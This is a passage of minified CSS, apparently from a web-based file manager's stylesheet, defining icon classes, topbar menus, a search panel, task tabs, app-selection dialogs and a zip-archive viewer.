\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');}.x-group-guest{background-image:url("../../../images/file_icon/icon_others/groupGuest.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');}.x-group-self-root{background-image:url("../../../images/file_icon/icon_others/groupSelfRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');}.x-group-root{background-image:url("../../../images/file_icon/icon_others/groupRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');}.x-group-public{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-tree-self{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-computer{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-tree-fav{background-image:url("../../../images/file_icon/icon_others/treeFav.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');}.x-edit{background-image:url("../../../images/file_icon/icon_others/edit.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');}.x-search{background-image:url("../../../images/file_icon/icon_others/search.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');}.x-upload{background-image:url("../../../images/file_icon/icon_others/upload.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');}.x-setting{background-image:url("../../../images/file_icon/icon_others/setting.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');}.x-logout{background-image:url("../../../images/file_icon/icon_others/logout.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');}.x-app-store{background-image:url("../../../images/file_icon/icon_others/appStore.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');}.x-error{background-image:url("../../../images/file_icon/icon_others/error.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');}.x-info{background-image:url("../../../images/file_icon/icon_others/info.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');}.frame-fullscreen{position:fixed;z-index:999499;left:0;top:0;}.font-icon{font-family:FontAwesome;font-style:normal;color:inherit;}.dragMaskView{position:absolute;top:0;left:0;right:0;bottom:0;z-index:888;background:#fff;opacity:0.01;filter:alpha(opacity=1);-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.content-box .ace_cjk{width:1em !important;}.content-box .ace_static_highlight{font-size:1.15em;}.aui-buttons button{font-size:1em;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.dialog-change-max,.dialog-change-max .aui-main{-webkit-transition:all 0.25s;-moz-transition:all 0.25s;-o-transition:all 0.25s;-ms-transition:all 0.25s;transition:all 0.25s;}.aui-title span{position:absolute;width:80%;overflow:hidden;height:30px;word-break:break-all;text-overflow:ellipsis;white-space:nowrap;}.less-error-message{display:none;}[class^="icon-"],[class*=" icon-"]{background-image:auto;}.btn-group-sm>.btn{padding:4px 10px;line-height:1em;}.btn{padding:6px 14px;border-radius:3px;box-sizing:content-box;}.btn:focus{outline:none;}.btn.btn-default .font-icon{color:#999;}.btn.btn-default:active,.btn.btn-default.active{border-color:#ADADAD;color:#888;}.btn.btn-left{border-top-right-radius:0;border-bottom-right-radius:0;}.btn.btn-middle{border-radius:0;}.btn.btn-right{border-top-left-radius:0;border-bottom-left-radius:0;}.btn.btn-lg{padding:10px 16px;font-size:18px;line-height:1.33;}.btn.btn-nomal{padding:4px 12px;}.btn.btn-sm{padding:2px 10px;}.btn.btn-xs{padding:1px 5px;font-size:12px;line-height:1.5;}.btn.btn-active{background:#63acff !important;border-color:#4fa1ff !important;border-bottom-color:#449cff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#8cc2ff', endColorstr='#63acff');background-image:-webkit-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-moz-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-o-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-ms-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);-pie-background:linear-gradient(to to bottom,#8cc2ff 0,#63acff 100%);}.btn.btn-active:hover,.btn.btn-active:active{background:#3a96ff !important;border-color:#268bff !important;border-bottom-color:#1c86ff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#63acff', endColorstr='#3a96ff');background-image:-webkit-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-moz-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-o-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-ms-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:linear-gradient(to bottom,#63acff 0,#3a96ff 100%);-pie-background:linear-gradient(to to bottom,#63acff 0,#3a96ff 100%);}.btn-group.disabled{opacity:0.6;filter:alpha(opacity=60);}.dropdown-menu{left:auto;right:0px;border-radius:4px;border:1px solid rgba(0,0,0,0.05);box-shadow:0 4px 30px rgba(0,0,0,0.15);max-height:400px;margin-top:0;}.dropdown-menu>li>a:hover,.dropdown-menu .this a,.dropdown-menu>li>a:focus{-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;background-image:none;filter:none;background:#63acff;color:#fff;}.dropdown-menu>li>a{font-weight:inherit;color:#666;}.dropdown-menu>li>a .font-icon{opacity:0.8;}.dropdown-menu:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);border-right:6px solid rgba(0,0,0,0);border-bottom:6px solid #FFF;position:absolute;top:-6px;right:10px;}.dropdown-menu:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);top:-7px;border-bottom:7px solid #CCC;border-bottom-color:rgba(0,0,0,0.2);right:9px;}.dropdown-menu.menu-top:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);top:inherit;border-right:6px solid rgba(0,0,0,0);border-top:6px solid #FFF;border-bottom:none;position:absolute;bottom:-6px;right:10px;}.dropdown-menu.menu-top:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-bottom:none;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);bottom:-7px;border-top:7px solid #CCC;border-top-color:rgba(0,0,0,0.2);right:9px;top:inherit;}.dropdown-menu .divider{margin:0.3em 0;}input{border:1px solid #ddd;background:#fff;outline:none;}input[type="radio"],input[type="checkbox"]{border:none;background:none;}.topbar{width:100%;height:40px;color:#ddd;top:0;background:#63acff;position:absolute;z-index:auto;}.topbar .content{padding:0px;line-height:40px;height:39px;word-break:break-all;}.topbar .content i.font-icon{display:inline-block;padding-right:10px;font-size:1.1em;}.topbar .content .topbar-menu{display:block;text-decoration:none;color:#fff;border:1px solid #4a9eff;overflow:hidden;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;padding:0px 1.2em;border-top:none;border-bottom:none;outline:none;float:left;margin-left:-1px;font-size:14px;}.topbar .content .topbar-menu.title{font-size:20px;width:200px;width:202px\0;padding:0;text-align:center;}.topbar .content .topbar-menu.title:hover{background:none;}.topbar .content .topbar-menu .icon{width:25px;height:25px;margin-right:5px;padding:0;margin-top:-4px;font-size:13px;line-height:25px;text-align:center;background:none;}.topbar .content .title img{max-width:200px;max-height:44px;}.topbar .content .open .topbar-menu,.topbar .content .topbar-menu:hover,.topbar .content .topbar-menu.this{background:#4a9eff;}.topbar .content .menu-desktop:before{content:"\f108";}.topbar .content .menu-explorer:before{content:"\f0ae";}.topbar .content .menu-editor:before{content:"\f044";}.topbar .content .top-left.collapse{display:block;height:auto !important;}.topbar .content .top-left{overflow:hidden;height:40px;width:70%;}.topbar .content .top-right{position:absolute;right:0px;top:0px;margin-right:0px;height:40px;}.topbar .content .top-right .menu-group{height:40px;margin-right:-1px;float:left;position:relative;}.topbar .content .top-right .topbar-menu{display:inline-block;padding:0px 6px;margin-right:1px;}.topbar .content .top-right .topbar-menu i{padding-right:3px;}.topbar .content .top-right .btn{color:#fff;}.topbar .content .top-right ul a{line-height:30px;height:30px;display:block;padding:0px 1.7em;border:none;overflow:hidden;}.topbar .content .top-right ul a:hover,.topbar .content .top-right ul a.this{margin-right:0px;}.topbar .content .top-right ul a.this{background:#63acff;color:#fff;}.topbar .content .top-right ul .font-icon{width:18px;display:inline-block;}.topbar .content .top-right ul.dropdown-menu{margin-top:-1px;}.topbar .content .top-right ul.dropdown-menu.topbar-language{width:470px;padding:10px 5px;}.topbar .content .top-right ul.dropdown-menu.topbar-language li{width:115px;float:left;margin:0 1px 1px 0;}.topbar .content .top-right ul.dropdown-menu.topbar-language a{padding:0 8px 0 8px;height:26px;line-height:26px;font-size:13px;}.topbar .content .top-right ul.dropdown-menu.topbar-language i.flag{padding-right:0px;background-color:#eee;position:relative;top:1px;}.topbar .content .share-title{text-align:center;color:#fff;float:left;margin-left:8px;margin-right:7px;}.topbar .content .share-title-info{color:#fff;font-size:1.25em;background:#eee;background:rgba(0,0,0,0.2);border-radius:4px;padding:6px;}.topbar .content .share-info{color:#fff;float:left;font-size:1em;}.topbar .content .share-info .time{padding-left:5px;color:#fff;padding-right:8px;}.topbar .content .top-right div.share-info-user{margin-right:10px;color:#fff;position:relative;}.topbar .content .top-right div.share-info-user .btn-download,.topbar .content .top-right div.share-info-user .btn.button-my-share{padding:4px 20px;margin-left:5px;}.topbar .content .top-right div.share-info-user .dropdown-toggle{height:16px;}.common-footer{position:fixed;bottom:0px;background:#f8f8f8;color:#999;font-size:1em;width:100%;text-align:center;border-top:1px solid #e8e8e8;height:31px;line-height:32px;overflow:hidden;}.common-footer .copyright-bottom{cursor:pointer;font-size:1.25em;color:#aaa;text-decoration:none;}.common-footer .copyright-bottom:hover{color:#f60;border-bottom:none;}.desktop-widget{z-index:10 !important;}.do-search-box{color:#888;}.do-search-box .search-header{padding:10px;padding-bottom:0px;}.do-search-box .search-header input[type='checkbox']{padding-left:0px;}.do-search-box .search-header label{font-size:1em;}.do-search-box .search-header .btn-right{margin:0px 0 0 -2px;height:25px;width:30px;padding:0;height:28px \9\0;position:absolute !important;}.do-search-box .search-header .s_br{margin-bottom:8px;line-height:25px;}.do-search-box .search-header #search-value,.do-search-box .search-header #search-path,.do-search-box .search-header #search-ext{height:23px;height:27px \0;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:125px;padding-left:10px;padding-right:10px;margin-left:5px;}.do-search-box .search-header #search-value:focus,.do-search-box .search-header #search-path:focus,.do-search-box .search-header #search-ext:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.do-search-box .search-header #search-value{width:190px;margin:0;padding:2px 5px 0px 5px;padding-top:1px \0;}.do-search-box #search-is-case{margin-left:10px;}.do-search-box .search-desc{height:30px;line-height:30px;text-align:center;font-size:13px;margin:0px 10px;border:1px solid #ddd;color:#3196e6;background-image:-webkit-linear-gradient(top,#fff,#def);border-top-left-radius:3px;border-top-right-radius:3px;}.do-search-box .search-result{overflow-y:auto;overflow-x:hidden;position:absolute;top:137px;bottom:0px;right:0px;left:0px;margin:10px;border:1px solid #ddd;border-top:none;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-items{list-style:none;margin:0px;padding:10px 0;font-size:13px;}.do-search-box .search-result .file-item .file-info{height:25px;line-height:25px;cursor:default;padding-left:10px;font-size:13px;color:#444;position:relative;word-wrap:break-word;word-break:break-all;overflow:hidden;}.do-search-box .search-result .file-item .file-info:hover{background:#eee;}.do-search-box .search-result .file-item .file-info .title{height:25px;color:#666;padding-left:5px;}.do-search-box .search-result .file-item .file-info .title:hover{border-bottom:1px solid #1387bb;cursor:pointer;color:#1387bb;}.do-search-box .search-result .file-item .file-info .switch{width:20px;height:20px;display:inline-block;text-align:center;color:#aaa;font-size:14px;}.do-search-box .search-result .file-item .file-info .file-icon{display:inline-block;width:18px;height:18px;}.do-search-box .search-result .file-item .file-info .file-icon img{width:100%;height:100%;}.do-search-box .search-result .file-item .file-info .result-num{margin:0 5px;border-radius:10px;background-color:#dfeaf3;color:#666;font-size:12px;padding:3px 8px;font-weight:bold;}.do-search-box .search-result .file-item .file-info .goto{position:absolute;right:0;top:0;width:30px;height:25px;line-height:25px;text-align:center;color:#bbb;background:#fff;cursor:pointer;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-item .file-info .goto:hover,.do-search-box .search-result .file-item .file-info:hover .goto:hover{background:#fbbc00;color:#fff;}.do-search-box .search-result .file-item .file-info:hover .goto{display:block;background:#e6e6e6;}.do-search-box .search-result .file-item .keyword{background:#ffef65;color:#000;}.do-search-box .search-result .file-item .result-item{list-style:none;margin:0px;padding:0px;}.do-search-box .search-result .file-item .result-item .result-info{height:25px;margin:0px;padding:0;line-height:25px;padding:0 15px;cursor:default;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;}.do-search-box .search-result .file-item .result-item .result-info:hover{background:#eee;}.do-search-box .search-result .file-item .result-item .result-info.this,.do-search-box .search-result .file-item .result-item .result-info.this:hover{background:#63acff;}.do-search-box .search-result .file-item .result-item .result-info.this .line,.do-search-box .search-result .file-item .result-item .result-info.this .search-info,.do-search-box .search-result .file-item .result-item .result-info.this:hover .line,.do-search-box .search-result .file-item .result-item .result-info.this:hover .search-info{color:#fff;}.do-search-box .search-result .file-item .result-item .line{display:inline-block;width:32px;margin-left:7px;padding-right:4px;text-align:right;font-weight:800;color:#aaa;}.do-search-box .search-result .file-item .result-item .search-info{font-family:Menlo, Consolas, source-code-pro, Monaco, 'Liberation Mono', 'Ubuntu Mono', Courier, 'Helvetica Neue', 'Microsoft Yahei', '微软雅黑', 'Lantinghei SC', STXihei, WenQuanYi, sans-serif;color:#444;}.do-search-box .search-result .file-item.open .file-info .switch .icon-caret-right:before{content:"\f0d7";}#maskViewContent .upload-tips{text-align:center;}#maskViewContent .upload-tips .icon-cloud{opacity:0.8;}#maskViewContent .upload-tips .icon-cloud.cloud2{font-size:180px;}#maskViewContent .upload-tips .icon-cloud.cloud1,#maskViewContent .upload-tips .icon-cloud.cloud3{position:absolute;opacity:0.6;}#maskViewContent .upload-tips .icon-cloud.cloud1{margin-left:-60px;margin-top:110px;-webkit-animation:moveLeftLoop 8.0s infinite ease-in-out;animation:moveLeftLoop 8.0s infinite ease-in-out;}#maskViewContent .upload-tips .icon-cloud.cloud3{margin-left:-50px;margin-top:60px;font-size:60px;animation-delay:4s;-webkit-animation-delay:4s;-webkit-animation:moveLeftLoop 10.0s infinite ease-in-out;animation:moveLeftLoop 10.0s infinite ease-in-out;}#maskViewContent .upload-tips .cloud-moveup{height:70px;}#maskViewContent .upload-tips .cloud-moveup i{position:absolute;margin-left:-23px;margin-top:-16px;}.task-tab{position:fixed;bottom:1px;left:0;width:100%;height:30px;padding-left:50px;z-index:100;background:rgba(0,0,0,0.1);border-top:1px solid rgba(0,0,0,0.15);color:#444;}.task-tab .tabs{height:100%;margin-right:20px;margin-right:60px;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.task-tab .tabs .tab{float:left;height:29px;margin-right:2px;white-space:nowrap;text-overflow:ellipsis;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0px 0px 0px #fff, 0px 0px 4px #000, 0px 0px 5px #000;color:#fff;border-radius:3px;cursor:default;overflow:hidden;font-size:1em;box-shadow:0 0 6px #666;padding-left:4px;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.3)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.3),rgba(255,255,255,0));-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.task-tab .tabs .tab.hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.5),rgba(255,255,255,0));}.task-tab .tabs .tab.this{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.7)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.7),rgba(255,255,255,0));box-shadow:0 0 6px #000;}.tasktab-dragging{position:fixed;position:absolute;z-index:99999;height:30px;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0 0 3px #000;box-shadow:0 0 6px #000;padding-left:4px;white-space:nowrap;text-overflow:ellipsis;border-radius:3px;cursor:default;color:#fff;overflow:hidden;font-size:1em;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.8)', endColorstr='rgba(255,255,255,0.2)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-o-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));-pie-background:linear-gradient(to top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));}.init-loading{position:fixed;left:50%;margin-left:-80px;top:40%;font-size:1.25em;z-index:999999;width:auto;}.init-loading div{padding:20px;background:#000;opacity:0.6;filter:alpha(opacity=60);margin:0 auto;color:#FFF;border-radius:6px;text-align:center;line-height:30px;}.init-loading img{border-radius:10px;}.space-info-bar{width:110px;}.space-info-bar .space-process{width:110px;height:6px;overflow:hidden;background-color:#ddd;margin:0px;border-radius:5px;}.space-info-bar .space-process .space-process-use{width:20%;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;height:100%;background-color:#428bca;border-radius:5px;}.space-info-bar .space-process .space-process-use.warning{background-color:#f00 !important;}.dialog-app-select .app-list{border:1px solid #ddd;padding:25px 0 0 10px;height:280px;overflow:auto;overflow-x:hidden;border-radius:4px;background:#f5f5f5;}.dialog-app-select .app-list .app-item{border:1px solid #f5f5f5;width:95px;height:110px;border-radius:4px;transition:all 0.2s ease 0s;margin:0 10px 10px 0;text-align:center;float:left;color:#444;text-decoration:none;}.dialog-app-select .app-list .app-item:hover{border-color:#77c2ff;background:#def;}.dialog-app-select .app-list .app-item.select{border-color:#559cec;background:#63acff;color:#fff;}.dialog-app-select .app-list .app-item .ico{width:64px;height:64px;display:table-cell;vertical-align:middle;padding:5px 0 0 16px;}.dialog-app-select .app-list .app-item .ico img{width:100%;height:auto;}.dialog-app-select .app-list .app-item .ico .x-item-file{display:block;}.dialog-app-select .app-list .app-item .ico [class^="icon-"].font-icon,.dialog-app-select .app-list .app-item .ico [class*="icon-"].font-icon{width:56px;height:56px;line-height:60px;font-size:28px;padding:0px;text-align:center;margin-top:-2px;border-radius:12px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(3,169,244,0.7)', endColorstr='rgba(63,81,181,0.5)');background-image:-webkit-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-moz-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-o-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-ms-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));-pie-background:linear-gradient(to 164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));color:#fff;display:inline-block;}.appbox{overflow:hidden;padding:0px 10px 0 0;}.appbox .appline{width:100%;margin-bottom:10px;line-height:20px;overflow:hidden;}.appbox .appline .left{float:left;width:80px;text-align:right;padding-right:14px;}.appbox .appline .right{float:left;}.appbox .appline input{margin-right:5px;}.appbox .appline label{display:inline-block;margin-left:-10px;padding:0 5px;}.appbox .appline input[type=text],.appbox .appline textarea{width:275px;padding:0px 5px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:28px;border-radius:3px;}.appbox .appline input[type=text]:focus,.appbox .appline textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.appbox .appline input[type=text].w30{width:50px;}.appbox .appline input[type=text].w20{width:30px;}.appbox .appline textarea{height:100px;}.appbox .appline.icon input{width:232px;}.appbox .appline.icon a{padding:2px 4px;top:0px;border:1px solid #CCC;}.appbox .appline.icon .open{margin-left:-12px;cursor:pointer;margin-top:-4px;font-size:14px;padding:3px 1em 4px 1em;}.appbox .appline.icon a img{width:20px;height:20px;}.zip-view-dialog .aui-content{min-width:400px;position:relative;}.zip-view-dialog .aui-title{height:90px;}.zip-view-dialog .zip-view-content{position:absolute;left:0;right:0;bottom:0;top:0px;margin:0px;min-width:400px;border:none;}.zip-view-dialog .zip-view-content .header{height:90px;background-color:#2c41b3;background-image:linear-gradient(to bottom,#2c41b3 0,#222b5d 100%);color:#fff;position:relative;}.zip-view-dialog .zip-view-content .header .bg{background:url("../../../images/common/banner/fly.png") 100px -300px;width:100%;height:100%;position:absolute;}.zip-view-dialog .zip-view-content .header .icon{width:56px;height:56px;position:absolute;left:20px;top:20px;}.zip-view-dialog .zip-view-content .header .name,.zip-view-dialog .zip-view-content .header .desc{position:absolute;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;width:80%;}.zip-view-dialog .zip-view-content .header .name{margin:22px 0 0 90px;font-size:18px;font-weight:800;}.zip-view-dialog .zip-view-content .header .desc{margin:50px 0 0 90px;}.zip-view-dialog .zip-view-content .zip-header-title{height:23px;line-height:23px;border-bottom:1px solid #ddd;border-top:1px solid #ddd;background:#f6f6f6 url("../../../images/common/bg.gif") 0 -30px;}.zip-view-dialog .zip-view-content .zip-header-title .item{float:left;}.zip-view-dialog .zip-view-content .zip-header-title .item span{display:block;border-right:1px solid #ddd;padding-left:10px;cursor:default;}.zip-view-dialog .zip-view-content .zip-header-title .name{width:60%;}.zip-view-dialog .zip-view-content .zip-header-title .size{width:10%;}.zip-view-dialog .zip-view-content .zip-header-title .mtime{width:30%;}.zip-view-dialog .zip-view-content .zip-header-title .item.mtime span{border-right:none;}.zip-view-dialog .zip-view-content .ztree{padding:0px;position:absolute;top:115px;left:0;right:0px;bottom:0;overflow:auto;}.zip-view-dialog .zip-view-content .ztree li,.zip-view-dialog .zip-view-content .ztree li ul{width:100%;}.zip-view-dialog .zip-view-content .ztree li a{position:relative;padding-left:0;color:#333;text-shadow:none;}.zip-view-dialog .zip-view-content .ztree li a:hover{transition:none;}.zip-view-dialog .zip-view-content .ztree li a.odd{background:#f1f7ff;}.zip-view-dialog .zip-view-content .ztree li a:hover,.zip-view-dialog .zip-view-content .ztree li a.odd:hover{background:#fdeec3;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode,.zip-view-dialog .zip-view-content .ztree li a.odd.curSelectedNode{background:#63acff;color:#fff;}.zip-view-dialog .zip-view-content .ztree li a .name{width:45%;overflow:hidden;position:absolute;word-break:break-all;text-overflow:ellipsis;}.zip-view-dialog .zip-view-content .ztree li a .time{width:27%;opacity:0.8;font-size:12px;position:absolute;left:72%;}.zip-view-dialog .zip-view-content .ztree li a .size{width:10%;opacity:0.8;font-size:12px;position:absolute;left:62%;}.zip-view-dialog .zip-view-content .ztree li a .menu-item-parent{display:none;position:absolute;right:0px;top:0;text-align:center;width:25px;height:24px;background:#fff;background:rgba(50,50,50,0.1);color:#666;}.zip-view-dialog .zip-view-content .ztree li a:hover .menu-item-parent{display:block;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode 